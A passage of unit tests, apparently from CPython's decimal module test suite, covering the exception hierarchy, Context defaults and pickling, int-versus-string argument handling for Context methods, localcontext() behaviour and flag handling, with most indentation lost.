self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
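    # The methods below all follow the same pattern: each Context operation
    # must accept plain ints wherever a Decimal operand is expected and must
    # raise TypeError when given a string instead.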
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
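    # localcontext() copies the active (or supplied) context on __enter__ and
    # restores the previous current context on __exit__.  Illustrative sketch:
    #
    #   with localcontext() as ctx:
    #       ctx.prec = 5      # changes are local to the with block
    #   # the previous context is back in effect here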
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
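        # The C implementation has no _raise_error() helper, so the flag is
        # set directly and the exception raised by hand when trapped; the
        # pure-Python implementation can use its private helper.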
        context = Context(prec=9, Emin=-425000000, Emax=425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
                new_flags = [k for k, v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
